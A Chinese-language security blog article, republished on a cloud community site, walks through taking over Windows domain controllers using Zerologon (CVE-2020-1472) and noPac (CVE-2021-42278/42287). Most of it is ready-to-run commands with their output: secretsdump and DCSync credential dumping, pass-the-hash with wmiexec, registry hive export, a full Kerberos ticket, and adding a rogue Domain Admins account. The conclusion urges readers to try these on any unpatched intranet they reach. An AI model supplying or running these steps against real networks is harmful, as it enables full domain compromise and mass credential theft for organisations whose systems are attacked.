首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >基础 | 内网渗透,一键拿下域控的两个漏洞

基础 | 内网渗透,一键拿下域控的两个漏洞

作者头像
信安之路
发布2025-10-21 13:28:29
发布2025-10-21 13:28:29
10000
代码可运行
举报
文章被收录于专栏:信安之路信安之路
运行总次数:0
代码可运行

今天来总结一下内网环境下,有哪些与域相关的漏洞,可以直接尝试,用于横向移动,更快的突破域控,拿到最高权限,历史上出现过两个漏洞。

CVE-2020-1472

CVE-2020-1472 是一个 windows 域控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。

利用工具:

https://github.com/mstxq17/cve-2020-1472

操作步骤(mac 作为攻击机,目标域控 10.211.55.38)

1、本地先尝试利用域控密码,导出域机器账户的 Hash,方 便与修改之后来对比。

proxychains4 secretsdump.py test.local/Administrator:'123QWEqwe!@#'@10.211.55.38 -just-dc-user "DC$"

或者去掉双引号,但是要注意在linux下$代表是变量的意思记得转义。

proxychains4 secretsdump.py test.local/Administrator:'123QWEqwe!@#'@10.211.55.38 -just-dc-user DC$

image-20200916115110187
image-20200916115110187

2、使用zerologon_tester.py,验证是否存在漏洞

python3 zerologon_tester.py DC 10.211.55.38

image-20200916115408007
image-20200916115408007

返回 Success,代表存在漏洞。

3、使用cve-2020-1472-exploit.py将机器账户重置

python3 cve-2020-1472-exploit.py dc$ 10.211.55.38

image-20200916115639951
image-20200916115639951

4、再次查看机器密码是否修改为空。

image-20200916115757385
image-20200916115757385

5、域控的机器账户可以使用 DCSync 导出域内所有用户凭据、导出原理:

image-20200916120658369
image-20200916120658369

利用DRS(Directory Replication Service,目录复制服务)协议通过IDL_DRSGetNCChanges从域控制器复制用户凭据。

proxychains4 secretsdump.py test.local/dc$@10.211.55.38 -no-pass

image-20200916120926625
image-20200916120926625

6、复DC$机器账户的密码 通过

proxychains4 secretsdump.py test.local/dc$@10.211.55.38 -no-pass -just-dc | grep 'Administrator'

获取到域管的 hash:

image-20200916143032315
image-20200916143032315
image-20200916143104828
image-20200916143104828

然后通过wmic, pass the hash 拿到域控制器中的本地管理员权限(域管)

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8adfc85c3490040e942ae1e6c68f645e test.local/Administrator@10.211.55.38

然后分别执行,拷贝本机中 SAM 数据库到 MAC 端:

代码语言:javascript
代码运行次数:0
运行
复制
- reg save HKLM\SYSTEM system.save
- reg save HKLM\SAM sam.save
- reg save HKLM\SECURITY security.save
- get system.save
- get sam.save
- get security.save
- del /f system.save
- del /f sam.save
- del /f security.save
image-20200916145737983
image-20200916145737983

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

提取出机器账号的明文hex

image-20200916145937435
image-20200916145937435

最后执行

代码语言:javascript
代码运行次数:0
运行
复制
proxychains4 python3 restorepassword.py DC@DC -target-ip 10.211.55.38 -hexpass 87e2812ccea41210c80e298c9e2a43a249d6a4056027787774340fbfd4b5f969563803b0f1bae7ccd24b29b41ae611025f1952793562d73e7f4e0f8938b3361332b35dd5ee22785b79b922149db32dc5c9301f4fd9fd090f532575bf5197a9c9230955bfd96ab928ae66b3999730c75b8545e26770816f21f2dbf9dbb19432211a91224c4c618507f7091ae09435a13a04bad5f056e72d34a96f67fa33d50e7596eca7709f398d98ba9e07407d7b2e4b937e40d1bf5ff0eb2240bdf0e8287e26ea5f8e69219fa7b1c5aa0e0bd8b992a176c32b0efb914fa6c1e53d69179110b02dfc1b1a0e53b445b92588420af18960
image-20200916155017962
image-20200916155017962

可以看到信息完整恢复了。

CVE-2021-42287

2021 年 11 月 9 日,国外研究员在推特上发布了 Active Directory 相关的 CVE,CVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致域内普通用户权限提升至域管权限。

利用工具, 需要自己编译为 exe 文件:

https://github.com/cube0x0/noPac

运行 noPac.exe 需要 .net 环境,下载地址:

https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=17718

null
null

执行命令,查看是否存在漏洞,顺便可以拿到域控的机器账号,看到这里的票据大小为 537,有师傅提醒说如果票据大于 1000,就是添加了 PAC,没有这个漏洞了。

.\noPac.exe scan -domain vulntarget.com -user win101 -pass admin#123 //账号密码为域成员win10的

null
null

可以看到是存在漏洞,能拿到票据。执行以下命令传递票据。

.\noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test /mPassword QWEasd123 /service cifs /ptt//这里会增加一个密码为admin@123的机器账号test

null
null
代码语言:javascript
代码运行次数:0
运行
复制
C:\Users\win101\Desktop\Powermad-master>.\noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test /mPassword QWEasd123 /service cifs /ptt[+] Distinguished Name = CN=test,CN=Computers,DC=vulntarget,DC=com[+] Machine account test added[+] Machine account test attribute serviceprincipalname cleared[+] Machine account test attribute samaccountname updated[+] Got TGT for WIN-UH20PRD3EAO.vulntarget.com[+] Machine account test attribute samaccountname updated[*] Action: S4U[*] Using domain controller: WIN-UH20PRD3EAO.vulntarget.com (10.0.10.100)[*] Building S4U2self request for: 'WIN-UH20PRD3EAO@VULNTARGET.COM'[*] Sending S4U2self request[+] S4U2self success![*] Substituting alternative service name 'cifs/WIN-UH20PRD3EAO.vulntarget.com'[*] Got a TGS for 'administrator' to 'cifs@VULNTARGET.COM'[*] base64(ticket.kirbi):      doIFzDCCBcigAwIBBaEDAgEWooIEuDCCBLRhggSwMIIErKADAgEFoRAbDlZVTE5UQVJHRVQuQ09NojEwL6ADAgEBoSgwJhsEY2lmcxseV0lOLVVIMjBQUkQzRUFPLnZ1bG50YXJnZXQuY29to4IEXjCCBFqgAwIBEqEDAgEDooIETASCBEirOVpwF2mskeBncTRkD5gQcgRUTZyU/OsEvtM7iT9ZOsJqBpkHZGvLILAvVCTiPcQ2SFaJxwWrvYzpNBNwrdriWoIOcSmbLc5DPSCvoLTkUIUZJWAX8czSuoleU/3dZ5gJpHUYKjPa/MEW/KWlr2hHE7IjgskiOrPy89MpIVQAI/iH1BvnoaVxEP6LNmQvrQXO9DOFvQigt3qh87Pc+n6bJ7HBBW6PTQiXTLlwDPLbJfuRU8UqTiUIpuS/hhT9nNTtzOF8Mb1SuXpYG97igldulsWHWlSs6gpFFe5wKtpGHluKUHWBOoQe4lZo/EgCmEGZfO/YNfIfiE7+fyLHMNfkecaDboKFi/6UKKihV5eTCwYAiaoDWuwBxMCOC1VbptozpyiSvFmwjtkYakK6DQKWdOSb4Ia2AXp3OEfTvcfq9cWQavNAOFMNR6txisCUko4+PCofEu9sL26w6vdqPnYLfie1aMLs/DWjavuWe6/8j2EcwX6vgvJYVXgSXQibnhVDbn7mf+4Tfaa4ht096fKX54j5ja9CjaElRuCogqW3TUeDSYUpjvMcpDPax0cLR/99/uZnx+s9BLda+jQX4lh3OmxtmUW8CjZS6Sv3XQW/CyhzD4B2RFPXk3Ya7j56F3Wikeq6yW9AHF2EuD+9fNpMhg2nydv9vtt19mAj2BfljXKWJz4EXnbT+sYEapcwchvufHQu6a2n/+iq2G9tjSkH6Z2Vnn8Ui+gJeTm2im+pVBntKR0CpnEAKlCtD3G5/RlqkZchY2zBPebMiyqx0mtBWqMMaTS3p0D//FLvX1oo3g80zShCelw4y+J3Z8MGZdUFw21Mckz9eIk5jt0VcX4h5snC/OlrMN7+yJAUl1tqC/O8tp4q2J9Jbqz+W5idJjNj1EGvnJ6kZ6owo/87qigObGchJKLZkS4wAuSe3kSh0PyirIBowjKJMVKtTg5ruW6y6cS+SGRLk5PRS7b9apSUKdH26XvXCLepH4s9Aje+fmLCPwzwVGp2+ErWeBOy6Pyi7malGE601/eg0M5XuaTc7EahgQuHY8KIZ8RBFJRrkMiULiBNctewgdm1bzRol0/GqtZT+5aH27klcGfLx3D8yUCylkl2o7sJVUwcNo6fYwtfElvm5JM9EiujfzDgkUTjSCSBrR9f/BihHNqYFVUfvhQDBAsL/6Lmo7nlMQN++Gq/oPukS5o6m/nykNwhbF178gtSE45jGKiGgBzvSFIkqI6I4JGxKJmpzk6UgoVL1BxguCkbgO/dlRhqvbjdSw5PrOph5KsiWkxwYuCvhCVs4EU23zvm0jrzhAsJwmQVVry9vhZLBRzagWSWEPD1g9vzIJoV/aO4GXgtcN/bbCfnodZ39SKosTinJ7E+tQpHipy+l54flXZHI9hapjpG5l7IvBScOARggTVaAV9L8fbvWyQJTjN8OgmF1L1DVQQnu03HBmCjqTIdo4H/MIH8oAMCAQCigfQEgfF9ge4wgeuggegwgeUwgeKgKzApoAMCARKhIgQg6IvCqN83Pz8hva8aEtoE655mm+mQdTAURKY5uKitJMGhEBsOVlVMTlRBUkdFVC5DT02iGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJhdG9yowcDBQAApQAApREYDzIwMjExMjE0MDEyNjA2WqYRGA8yMDIxMTIxNDExMjYwNlqnERgPMjAyMTEyMjEwMTI2MDZaqBAbDlZVTE5UQVJHRVQuQ09NqTEwL6ADAgEBoSgwJhsEY2lmcxseV0lOLVVIMjBQUkQzRUFPLnZ1bG50YXJnZXQuY29t[+] Ticket successfully imported!

在域控上会多一个机器账号test

null
null

添加域管账号

代码语言:javascript
代码运行次数:0
运行
复制
net user admin QWEasd@123 /add /domainnet group "Domain Admins" admin /add /domain
null
null

查看域管账号是否添加成功

代码语言:javascript
代码运行次数:0
运行
复制
net group "domain admins" /domain
null
null

有了域控账密,可以使用PsExec64.exe来对域控进行下一步的操作,开3389之类的。

代码语言:javascript
代码运行次数:0
运行
复制
null
null

到此就已经拿下域控了。

总结

这里整理了两个可以直接打域控的历史漏洞,如果目标内网域控未升级,那么只要你能进入内网,不妨试一下,说不定可以一步到位拿下域控,走上人生巅峰。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-09-16,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安之路 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • CVE-2020-1472
    • 操作步骤(mac 作为攻击机,目标域控 10.211.55.38)
  • CVE-2021-42287
  • 总结
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档